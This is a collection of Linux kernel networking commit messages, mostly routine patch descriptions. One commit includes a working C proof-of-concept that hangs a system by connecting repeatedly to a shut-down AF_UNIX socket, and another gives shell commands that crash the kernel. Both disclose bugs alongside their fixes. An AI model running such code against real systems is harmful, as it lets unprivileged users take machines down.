We need tcp_parse_options to be aware of dst_entry to
take into account per dst_entry TCP options settings
Signed-off-by: Gilad Ben-Yossef <gilad@codefidence.com>
Sigend-off-by: Ori Finkelman <ori@comsleep.com>
Sigend-off-by: Yony Amit <yony@comsleep.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Since we only use tcp_parse_options here to check for the exietence
of TCP timestamp option in the header, it is better to call with
the "established" flag on.
Signed-off-by: Gilad Ben-Yossef <gilad@codefidence.com>
Signed-off-by: Ori Finkelman <ori@comsleep.com>
Signed-off-by: Yony Amit <yony@comsleep.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Speedup module unloading by factorizing synchronize_rcu() calls
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Speedup module unloading by factorizing synchronize_rcu() calls
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Speedup module unloading by factorizing synchronize_rcu() calls
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Speedup module unloading by factorizing synchronize_rcu() calls
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Speedup module unloading by factorizing synchronize_rcu() calls
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Augment raw_send_hdrinc to correct for incorrect ip header length values
A series of oopses was reported to me recently. Apparently when using AF_RAW
sockets to send data to peers that were reachable via ipsec encapsulation,
people could panic or BUG halt their systems.
I've tracked the problem down to user space sending an invalid ip header over an
AF_RAW socket with IP_HDRINCL set to 1.
Basically what happens is that userspace sends down an ip frame that includes
only the header (no data), but sets the ip header ihl value to a large number,
one that is larger than the total amount of data passed to the sendmsg call. In
raw_send_hdrincl, we allocate an skb based on the size of the data in the msghdr
that was passed in, but assume the data is all valid. Later during ipsec
encapsulation, xfrm4_tranport_output moves the entire frame back in the skbuff
to provide headroom for the ipsec headers. During this operation, the
skb->transport_header is repointed to a spot computed by
skb->network_header + the ip header length (ihl). Since so little data was
passed in relative to the value of ihl provided by the raw socket, we point
transport header to an unknown location, resulting in various crashes.
This fix for this is pretty straightforward, simply validate the value of of
iph->ihl when sending over a raw socket. If (iph->ihl*4U) > user data buffer
size, drop the frame and return -EINVAL. I just confirmed this fixes the
reported crashes.
Signed-off-by: Neil Horman <nhorman@tuxdriver.com>
Acked-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Implements the netdev_ops.ndo_fcoe_get_wwn for VLAN device.
Signed-off-by: Yi Zou <yi.zou@intel.com>
Signed-off-by: Jeff Kirsher <jeffrey.t.kirsher@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Corrected a spelling error in a function name.
Signed-off-by: Andreas Petlund <apetlund@simula.no>
Signed-off-by: David S. Miller <davem@davemloft.net>
commit d519e17e2d
(net: export device speed and duplex via sysfs)
made the wrong assumption that netdev->ethtool_ops was always set.
This makes possible to crash kernel and let rtnl in locked state.
modprobe dummy
ip link set dummy0 up
(udev runs and crash)
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Acked-by: Andy Gospodarek <andy@greyhouse.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
Speedup module unloading by factorizing synchronize_rcu() calls
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Speedup module unloading by factorizing synchronize_rcu() calls
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Use unregister_netdevice_many() to speedup master device unregister.
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Adding a list_head parameter to rtnl_link_ops->dellink() methods
allow us to queue devices on a list, in order to dismantle
them all at once.
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Introduce rollback_registered_many() and unregister_netdevice_many()
rollback_registered_many() is able to perform necessary steps at device dismantle
time, factorizing two expensive synchronize_net() calls.
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
This patchs adds an unreg_list anchor to struct net_device, and
introduces an unregister_netdevice_queue() function, able to queue
a net_device to a list instead of immediately unregister it.
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
This makes the mesh housekeeping timer work properly on big endian
systems.
Signed-off-by: Rui Paulo <rpaulo@gmail.com>
Signed-off-by: Javier Cardona <javier@cozybit.com>
Signed-off-by: John W. Linville <linville@tuxdriver.com>
Mesh portals proxy traffic for nodes external to the mesh. When a
proxied frame is received by a mesh interface, it should update its mesh
portal table. This was only happening for unicast frames. With this
change we also learn about mesh portals from proxied multicast frames.
Signed-off-by: Javier Cardona <javier@cozybit.com>
Signed-off-by: John W. Linville <linville@tuxdriver.com>
Replace netif_tx_{start,stop,wake}_all_queues with the single-queue
equivalents (i.e. netif_{start,stop,wake}_queue). Since we are down to
a single queue, these should peform slightly better.
Signed-off-by: John W. Linville <linville@tuxdriver.com>
It might be the case that __cfg80211_disconnected() has already
cleaned up wdev->current_bss() for us. The old code didn't catch
that situation and didn't warn needlessly.
Signed-off-by: Holger Schurig <hs4233@mail.mn-solutions.de>
Signed-off-by: John W. Linville <linville@tuxdriver.com>
Get rid of cookies in cfg80211_send_XXX() functions.
Signed-off-by: Holger Schurig <hs4233@mail.mn-solutions.de>
Signed-off-by: John W. Linville <linville@tuxdriver.com>
When hostapd injects a frame, e.g. an authentication or association
response, mac80211 looks for a suitable access point virtual interface
to associate the frame with based on its source address. This makes it
possible e.g. to correctly assign sequence numbers to the frames.
A small typo in the ethernet address comparison statement caused a
failure to find a suitable ap interface. Sequence numbers on such
frames where therefore left unassigned causing some clients
(especially windows-based 11b/g clients) to reject them and fail to
authenticate or associate with the access point. This patch fixes the
typo in the address comparison statement.
Signed-off-by: Björn Smedman <bjorn.smedman@venatech.se>
Reviewed-by: Johannes Berg <johannes@sipsolutions.net>
Cc: stable@kernel.org
Signed-off-by: John W. Linville <linville@tuxdriver.com>
Fix a typo in the description of hwmp_route_info_get(), no function
changes.
Signed-off-by: Andrey Yurovsky <andrey@cozybit.com>
Signed-off-by: John W. Linville <linville@tuxdriver.com>
When the in-kernel SME gets an association failure from
the AP we don't deauthenticate, and thus get into a very
confused state which will lead to warnings later on. Fix
this by actually deauthenticating when the AP indicates
an association failure.
(Brought to you by the hacking session at Kernel Summit 2009 in Tokyo,
Japan. -- JWL)
Signed-off-by: Johannes Berg <johannes@sipsolutions.net>
Signed-off-by: John W. Linville <linville@tuxdriver.com>
When association fails, we should stay authenticated,
which in mac80211 is represented by the existence of
the mlme work struct, so we cannot free that, instead
we need to just set it to idle.
(Brought to you by the hacking session at Kernel Summit 2009 in Tokyo,
Japan. -- JWL)
Signed-off-by: Johannes Berg <johannes@sipsolutions.net>
Signed-off-by: John W. Linville <linville@tuxdriver.com>
Recent commit "mac80211: fix logic error ibss merge bssid check" fixed
joining of ibss cell when static bssid is provided. In this case
ifibss->bssid is set before the cell is joined and comparing that address
to a bss should thus always succeed. Unfortunately this change broke the
other case of joining a ibss cell without providing a static bssid where
the value of ifibss->bssid is not set before the cell is joined.
Since ifibss->bssid may be set before or after joining the cell we do not
learn anything by comparing it to a known bss. Remove this check.
Signed-off-by: Reinette Chatre <reinette.chatre@intel.com>
Signed-off-by: John W. Linville <linville@tuxdriver.com>
We currently use a 16 bit field (vlan_tci) to store VLAN ID/PRIO on a skb.
Null value is used as a special value, meaning vlan tagging not enabled.
This forbids use of null vlan ID.
As pointed by David, some drivers use the 3 high order bits (PRIO)
As VLAN ID is 12 bits, we can use the remaining bit (CFI) as a flag, and
allow null VLAN ID.
In case future code really wants to use VLAN_CFI_MASK, we'll have to use
a bit outside of vlan_tci.
#define VLAN_PRIO_MASK 0xe000 /* Priority Code Point */
#define VLAN_PRIO_SHIFT 13
#define VLAN_CFI_MASK 0x1000 /* Canonical Format Indicator */
#define VLAN_TAG_PRESENT VLAN_CFI_MASK
#define VLAN_VID_MASK 0x0fff /* VLAN Identifier */
Reported-by: Gertjan Hofman <gertjan_hofman@yahoo.com>
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
While playing with pktgen, I realized IP ID was not filled and a
random value was taken, possibly leaking 2 bytes of kernel memory.
We can use an increasing ID, this can help diagnostics anyway.
Also clear packet payload, instead of leaking kernel memory.
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
When handling large number of netdevice, rtnl_dump_ifinfo()
is very slow because it has O(N^2) complexity.
Instead of scanning one single list, we can use the 256 sub lists
of the dev_index hash table.
This considerably speedups "ip link" operations
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
GRE tunnels use one rwlock to protect their hash tables.
This locking scheme can be converted to RCU for free, since netdevice
already must wait for a RCU grace period at dismantle time.
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
ip6_tunnels use one rwlock to protect their hash tables.
This locking scheme can be converted to RCU for free, since netdevice
already must wait for a RCU grace period at dismantle time.
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
IPIP tunnels use one rwlock to protect their hash tables.
This locking scheme can be converted to RCU for free, since netdevice
already must wait for a RCU grace period at dismantle time.
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
xfrm6_tunnels use one rwlock to protect their hash tables.
Plain and straightforward conversion to RCU locking to permit better SMP
performance.
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
SIT tunnels use one rwlock to protect their hash tables.
This locking scheme can be converted to RCU for free, since netdevice
already must wait for a RCU grace period at dismantle time.
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
SIT tunnels use one rwlock to protect their prl entries.
This first patch adds RCU locking for prl management,
with standard call_rcu() calls.
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Commit b6b39e8f3f (tcp: Try to catch MSG_PEEK bug) added a printk()
to the WARN_ON() that's in tcp.c. This patch changes this combination
to WARN(); the advantage of WARN() is that the printk message shows up
inside the message, so that kerneloops.org will collect the message.
In addition, this gets rid of an extra if() statement.
Signed-off-by: Arjan van de Ven <arjan@linux.intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
rtnl_getlink() & rtnl_setlink() run with RTNL held, we can use
__dev_get_by_index() and __dev_get_by_name() variants and avoid
dev_hold()/dev_put()
Adds to rtnl_getlink() the capability to find a device by its name,
not only by its index.
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
For connected sockets, the first run of dev_pick_tx saves the
calculated txq in sk_tx_queue_mapping. This is not saved if
either the device has a queue select or the socket is not
connected. Next iterations of dev_pick_tx uses the cached value
of sk_tx_queue_mapping.
Signed-off-by: Krishna Kumar <krkumar2@in.ibm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
dst_negative_advice() should check for changed dst and reset
sk_tx_queue_mapping accordingly. Pass sock to the callers of
dst_negative_advice.
(sk_reset_txq is defined just for use by dst_negative_advice. The
only way I could find to get around this is to move dst_negative_()
from dst.h to dst.c, include sock.h in dst.c, etc)
Signed-off-by: Krishna Kumar <krkumar2@in.ibm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
IPv6: Reset sk_tx_queue_mapping when dst_cache is reset. Use existing
macro to do the work.
Signed-off-by: Krishna Kumar <krkumar2@in.ibm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Introduce sk_tx_queue_mapping; and functions that set, test and
get this value. Reset sk_tx_queue_mapping to -1 whenever the dst
cache is set/reset, and in socket alloc. Setting txq to -1 and
using valid txq=<0 to n-1> allows the tx path to use the value
of sk_tx_queue_mapping directly instead of subtracting 1 on every
tx.
Signed-off-by: Krishna Kumar <krkumar2@in.ibm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
It can help being able to filter packets on their queue_mapping.
If filter performance is not good, we could add a "numqueue" field
in struct packet_type, so that netif_nit_deliver() and other functions
can directly ignore packets with not expected queue number.
Lets experiment this simple filter extension first.
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
We hold RTNL, we can use __dev_get_by_index() instead of dev_get_by_index()
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
While doing multiple captures, I found af_packet was dirtying cache line
containing its prot_hook.
This slow down machines where several cpus are necessary to handle capture
traffic, as each prot_hook is traversed for each packet coming in or out
the host.
This patches moves "struct packet_type prot_hook" to the end of
packet_sock, and uses a ____cacheline_aligned_in_smp to make sure
this remains shared by all cpus.
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
This patch tries to print out more information when we hit the
MSG_PEEK bug in tcp_recvmsg. It's been around since at least
2005 and it's about time that we finally fix it.
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
Use symbols instead of magic constants while checking PMTU discovery
setsockopt.
Remove redundant test in ip_rt_frag_needed() (done by caller).
Signed-off-by: John Dykstra <john.dykstra1@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Allow bpf to set a filter to drop packets that dont
match a specific mark
Signed-off-by: Jamal Hadi Salim <hadi@cyberus.ca>
Signed-off-by: David S. Miller <davem@davemloft.net>
ipv4/ipv6 setsockopt(IP_MULTICAST_IF) have dubious __dev_get_by_index() calls.
This function should be called only with RTNL or dev_base_lock held, or reader
could see a corrupt hash chain and eventually enter an endless loop.
Fix is to call dev_get_by_index()/dev_put().
If this happens to be performance critical, we could define a new dev_exist_by_index()
function to avoid touching dev refcount.
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Fix TCP_DEFER_ACCEPT conversion between seconds and
retransmission to match the TCP SYN-ACK retransmission periods
because the time is converted to such retransmissions. The old
algorithm selects one more retransmission in some cases. Allow
up to 255 retransmissions.
Signed-off-by: Julian Anastasov <ja@ssi.bg>
Acked-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Change SYN-ACK retransmitting code for the TCP_DEFER_ACCEPT
users to not retransmit SYN-ACKs during the deferring period if
ACK from client was received. The goal is to reduce traffic
during the deferring period. When the period is finished
we continue with sending SYN-ACKs (at least one) but this time
any traffic from client will change the request to established
socket allowing application to terminate it properly.
Also, do not drop acked request if sending of SYN-ACK fails.
Signed-off-by: Julian Anastasov <ja@ssi.bg>
Acked-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Willy Tarreau and many other folks in recent years
were concerned what happens when the TCP_DEFER_ACCEPT period
expires for clients which sent ACK packet. They prefer clients
that actively resend ACK on our SYN-ACK retransmissions to be
converted from open requests to sockets and queued to the
listener for accepting after the deferring period is finished.
Then application server can decide to wait longer for data
or to properly terminate the connection with FIN if read()
returns EAGAIN which is an indication for accepting after
the deferring period. This change still can have side effects
for applications that expect always to see data on the accepted
socket. Others can be prepared to work in both modes (with or
without TCP_DEFER_ACCEPT period) and their data processing can
ignore the read=EAGAIN notification and to allocate resources for
clients which proved to have no data to send during the deferring
period. OTOH, servers that use TCP_DEFER_ACCEPT=1 as flag (not
as a timeout) to wait for data will notice clients that didn't
send data for 3 seconds but that still resend ACKs.
Thanks to Willy Tarreau for the initial idea and to
Eric Dumazet for the review and testing the change.
Signed-off-by: Julian Anastasov <ja@ssi.bg>
Acked-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
This reverts commit 6d01a026b7.
Julian Anastasov, Willy Tarreau and Eric Dumazet have come up
with a more correct way to deal with this.
Signed-off-by: David S. Miller <davem@davemloft.net>
I found a deadlock bug in UNIX domain socket, which makes able to DoS
attack against the local machine by non-root users.
How to reproduce:
1. Make a listening AF_UNIX/SOCK_STREAM socket with an abstruct
namespace(*), and shutdown(2) it.
2. Repeat connect(2)ing to the listening socket from the other sockets
until the connection backlog is full-filled.
3. connect(2) takes the CPU forever. If every core is taken, the
system hangs.
PoC code: (Run as many times as cores on SMP machines.)
int main(void)
{
int ret;
int csd;
int lsd;
struct sockaddr_un sun;
/* make an abstruct name address (*) */
memset(&sun, 0, sizeof(sun));
sun.sun_family = PF_UNIX;
sprintf(&sun.sun_path[1], "%d", getpid());
/* create the listening socket and shutdown */
lsd = socket(AF_UNIX, SOCK_STREAM, 0);
bind(lsd, (struct sockaddr *)&sun, sizeof(sun));
listen(lsd, 1);
shutdown(lsd, SHUT_RDWR);
/* connect loop */
alarm(15); /* forcely exit the loop after 15 sec */
for (;;) {
csd = socket(AF_UNIX, SOCK_STREAM, 0);
ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun));
if (-1 == ret) {
perror("connect()");
break;
}
puts("Connection OK");
}
return 0;
}
(*) Make sun_path[0] = 0 to use the abstruct namespace.
If a file-based socket is used, the system doesn't deadlock because
of context switches in the file system layer.
Why this happens:
Error checks between unix_socket_connect() and unix_wait_for_peer() are
inconsistent. The former calls the latter to wait until the backlog is
processed. Despite the latter returns without doing anything when the
socket is shutdown, the former doesn't check the shutdown state and
just retries calling the latter forever.
Patch:
The patch below adds shutdown check into unix_socket_connect(), so
connect(2) to the shutdown socket will return -ECONREFUSED.
Signed-off-by: Tomoki Sekiyama <tomoki.sekiyama.qu@hitachi.com>
Signed-off-by: Masanori Yoshida <masanori.yoshida.tv@hitachi.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
The last users of skb_icv_walk are converted to ahash now,
so skb_icv_walk is unused and can be removed.
Signed-off-by: Steffen Klassert <steffen.klassert@secunet.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
This patch converts ah6 to the new ahash interface.
Signed-off-by: Steffen Klassert <steffen.klassert@secunet.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
This patch converts ah4 to the new ahash interface.
Signed-off-by: Steffen Klassert <steffen.klassert@secunet.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
- skb_kill_datagram() can increment sk->sk_drops itself, not callers.
- UDP on IPV4 & IPV6 dropped frames (because of bad checksum or policy checks) increment sk_drops
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
In order to have better cache layouts of struct sock (separate zones
for rx/tx paths), we need this preliminary patch.
Goal is to transfert fields used at lookup time in the first
read-mostly cache line (inside struct sock_common) and move sk_refcnt
to a separate cache line (only written by rx path)
This patch adds inet_ prefix to daddr, rcv_saddr, dport, num, saddr,
sport and id fields. This allows a future patch to define these
fields as macros, like sk_refcnt, without name clashes.
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
1. GENL_MIN_ID is a valid id -> no need to start at
GENL_MIN_ID + 1.
2. Avoid going through the ids two times: If we start at
GENL_MIN_ID+1 (*or bigger*) and all ids are over!, the
code iterates through the list twice (*or lesser*).
3. Simplify code - no need to start at idx=0 which gets
reset to GENL_MIN_ID.
Patch on net-next-2.6. Reboot test shows that first id
passed to genl_register_family was 16, next two were
GENL_ID_GENERATE and genl_generate_id returned 17 & 18
(user level testing of same code shows expected values
across entire range of MIN/MAX).
Signed-off-by: Krishna Kumar <krkumar2@in.ibm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
genl_register_family() doesn't need to call genl_family_find_byid
when GENL_ID_GENERATE is passed during register.
Patch on net-next-2.6, compile and reboot testing only.
Signed-off-by: Krishna Kumar <krkumar2@in.ibm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Remove duplicate sock_set_flag(sk, SOCK_ZAPPED) in iucv_sock_close,
which has been overlooked in September-commit
7514bab04e.
Cc: Hendrik Brueckner <brueckner@linux.vnet.ibm.com>
Signed-off-by: Ursula Braun <ursula.braun@de.ibm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Instead of modifying sk->sk_ack_backlog directly, use respective
socket functions.
Signed-off-by: Hendrik Brueckner <brueckner@linux.vnet.ibm.com>
Signed-off-by: Ursula Braun <ursula.braun@de.ibm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Rémi Denis-Courmont <remi.denis-courmont@nokia.com>
Acked-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
sock_queue_rcv_skb() can update sk_drops itself, removing need for
callers to take care of it. This is more consistent since
sock_queue_rcv_skb() also reads sk_drops when queueing a skb.
This adds sk_drops managment to many protocols that not cared yet.
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
The Phonet "universe" only has 64 addresses, so we keep a trivial flat
routing table.
Signed-off-by: Rémi Denis-Courmont <remi.denis-courmont@nokia.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Looking at commit ebc3f64b86 it appears that this was intended
and not the original, equivalent to `if (facilities.reverse & ~0x81)'.
In x25_parse_facilities() that patch changed how facilities->reverse
was set. No other bits were set than 0x80 and/or 0x01.
Signed-off-by: Roel Kluin <roel.kluin@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Storing the mask (size - 1) instead of the size allows fast path to be
a bit faster.
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
udp_poll() can in some circumstances drop frames with incorrect checksums.
Problem is we now have to lock the socket while dropping frames, or risk
sk_forward corruption.
This bug is present since commit 95766fff6b
([UDP]: Add memory accounting.)
While we are at it, we can correct ioctl(SIOCINQ) to also drop bad frames.
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
I was trying to use TCP_DEFER_ACCEPT and noticed that if the
client does not talk, the connection is never accepted and
remains in SYN_RECV state until the retransmits expire, where
it finally is deleted. This is bad when some firewall such as
netfilter sits between the client and the server because the
firewall sees the connection in ESTABLISHED state while the
server will finally silently drop it without sending an RST.
This behaviour contradicts the man page which says it should
wait only for some time :
TCP_DEFER_ACCEPT (since Linux 2.4)
Allows a listener to be awakened only when data arrives
on the socket. Takes an integer value (seconds), this
can bound the maximum number of attempts TCP will
make to complete the connection. This option should not
be used in code intended to be portable.
Also, looking at ipv4/tcp.c, a retransmit counter is correctly
computed :
case TCP_DEFER_ACCEPT:
icsk->icsk_accept_queue.rskq_defer_accept = 0;
if (val > 0) {
/* Translate value in seconds to number of
* retransmits */
while (icsk->icsk_accept_queue.rskq_defer_accept < 32 &&
val > ((TCP_TIMEOUT_INIT / HZ) <<
icsk->icsk_accept_queue.rskq_defer_accept))
icsk->icsk_accept_queue.rskq_defer_accept++;
icsk->icsk_accept_queue.rskq_defer_accept++;
}
break;
==> rskq_defer_accept is used as a counter of retransmits.
But in tcp_minisocks.c, this counter is only checked. And in
fact, I have found no location which updates it. So I think
that what was intended was to decrease it in tcp_minisocks
whenever it is checked, which the trivial patch below does.
Signed-off-by: Willy Tarreau <w@1wt.eu>
Signed-off-by: David S. Miller <davem@davemloft.net>
Meaning receive multiple messages, reducing the number of syscalls and
net stack entry/exit operations.
Next patches will introduce mechanisms where protocols that want to
optimize this operation will provide an unlocked_recvmsg operation.
This takes into account comments made by:
. Paul Moore: sock_recvmsg is called only for the first datagram,
sock_recvmsg_nosec is used for the rest.
. Caitlin Bestler: recvmmsg now has a struct timespec timeout, that
works in the same fashion as the ppoll one.
If the underlying protocol returns a datagram with MSG_OOB set, this
will make recvmmsg return right away with as many datagrams (+ the OOB
one) it has received so far.
. Rémi Denis-Courmont & Steven Whitehouse: If we receive N < vlen
datagrams and then recvmsg returns an error, recvmmsg will return
the successfully received datagrams, store the error and return it
in the next call.
This paves the way for a subsequent optimization, sk_prot->unlocked_recvmsg,
where we will be able to acquire the lock only at batch start and end, not at
every underlying recvmsg call.
Signed-off-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Create a new socket level option to report number of queue overflows
Recently I augmented the AF_PACKET protocol to report the number of frames lost
on the socket receive queue between any two enqueued frames. This value was
exported via a SOL_PACKET level cmsg. AFter I completed that work it was
requested that this feature be generalized so that any datagram oriented socket
could make use of this option. As such I've created this patch, It creates a
new SOL_SOCKET level option called SO_RXQ_OVFL, which when enabled exports a
SOL_SOCKET level cmsg that reports the nubmer of times the sk_receive_queue
overflowed between any two given frames. It also augments the AF_PACKET
protocol to take advantage of this new feature (as it previously did not touch
sk->sk_drops, which this patch uses to record the overflow count). Tested
successfully by me.
Notes:
1) Unlike my previous patch, this patch simply records the sk_drops value, which
is not a number of drops between packets, but rather a total number of drops.
Deltas must be computed in user space.
2) While this patch currently works with datagram oriented protocols, it will
also be accepted by non-datagram oriented protocols. I'm not sure if thats
agreeable to everyone, but my argument in favor of doing so is that, for those
protocols which aren't applicable to this option, sk_drops will always be zero,
and reporting no drops on a receive queue that isn't used for those
non-participating protocols seems reasonable to me. This also saves us having
to code in a per-protocol opt in mechanism.
3) This applies cleanly to net-next assuming that commit
977750076d (my af packet cmsg patch) is reverted
Signed-off-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
ieee80211_rx() must be called with softirqs disabled
since the networking stack requires this for netif_rx()
and some code in mac80211 can assume that it can not
be processing its own tasklet and this call at the same
time.
It may be possible to remove this requirement after a
careful audit of mac80211 and doing any needed locking
improvements in it along with disabling softirqs around
netif_rx(). An alternative might be to push all packet
processing to process context in mac80211, instead of
to the tasklet, and add other synchronisation.
Signed-off-by: Johannes Berg <johannes@sipsolutions.net>
Signed-off-by: John W. Linville <linville@tuxdriver.com>
When a scan completes, we call ieee80211_sta_find_ibss(),
which is also called from other places. When the scan was
done in software, there's no problem as both run from the
single-threaded mac80211 workqueue and are thus serialised
against each other, but with hardware scan the completion
can be in a different context and race against callers of
this function from the workqueue (e.g. due to beacon RX).
So instead of calling ieee80211_sta_find_ibss() directly,
just arm the timer and have it fire, scheduling the work,
which will invoke ieee80211_sta_find_ibss() (if that is
appropriate in the current state).
Signed-off-by: Johannes Berg <johannes@sipsolutions.net>
Signed-off-by: John W. Linville <linville@tuxdriver.com>
Signed-off-by: Felix Fietkau <nbd@openwrt.org>
Acked-by: Johannes Berg <johannes@sipsolutions.net>
Signed-off-by: John W. Linville <linville@tuxdriver.com>
ipv6 sit: Set relay to 0.0.0.0 directly if relay_prefixlen == 0.
Do not use bit-shift if relay_prefixlen == 0;
relay_prefix << 32 does not result in 0.
Signed-off-by: YOSHIFUJI Hideaki <yoshfuji@linux-ipv6.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
ipv6 sit: Fix 6rd relay address.
Relay's address should be extracted from real IPv6 address
instead of configured prefix.
Signed-off-by: YOSHIFUJI Hideaki <yoshfuji@linux-ipv6.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
ipv6 sit: Ensure to initialize 6rd parameters.
Signed-off-by: YOSHIFUJI Hideaki <yoshfuji@linux-ipv6.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
This probably deserves to go into -stable.
Pedit will reject a policy that is large because it
uses the wrong structure in the policy validation.
This fixes it.
Signed-off-by: Jamal Hadi Salim <hadi@cyberus.ca>
Signed-off-by: David S. Miller <davem@davemloft.net>
The error unwinding code in set_netns has a bug
that will make it run into a BUG_ON if passed a
bad wiphy index, fix by not trying to unlock a
wiphy that doesn't exist.
Signed-off-by: Johannes Berg <johannes@sipsolutions.net>
Signed-off-by: John W. Linville <linville@tuxdriver.com>
Commit 9ef1d4c7c7 ("[NETLINK]: Missing
initializations in dumped data") introduced a typo in
initialization. This patch fixes this.
Signed-off-by: Jiri Pirko <jpirko@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Allow enable/disable UFO on bridge device via ethtool
Signed-off-by: Sridhar Samudrala <sri@us.ibm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Now that software UFO is supported, UFO can be enabled on master
devices like bridge, bond even though the attached device doesn't
support this feature in hardware.
This allows UFO to be used between KVM host and guest even when a
physical interface attached to the bridge doesn't support UFO.
Signed-off-by: Sridhar Samudrala <sri@us.ibm.com>
Acked-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
UDP_HTABLE_SIZE was initialy defined to 128, which is a bit small for
several setups.
4000 active UDP sockets -> 32 sockets per chain in average. An
incoming frame has to lookup all sockets to find best match, so long
chains hurt latency.
Instead of a fixed size hash table that cant be perfect for every
needs, let UDP stack choose its table size at boot time like tcp/ip
route, using alloc_large_system_hash() helper
Add an optional boot parameter, uhash_entries=x so that an admin can
force a size between 256 and 65536 if needed, like thash_entries and
rhash_entries.
dmesg logs two new lines :
[ 0.647039] UDP hash table entries: 512 (order: 0, 4096 bytes)
[ 0.647099] UDP Lite hash table entries: 512 (order: 0, 4096 bytes)
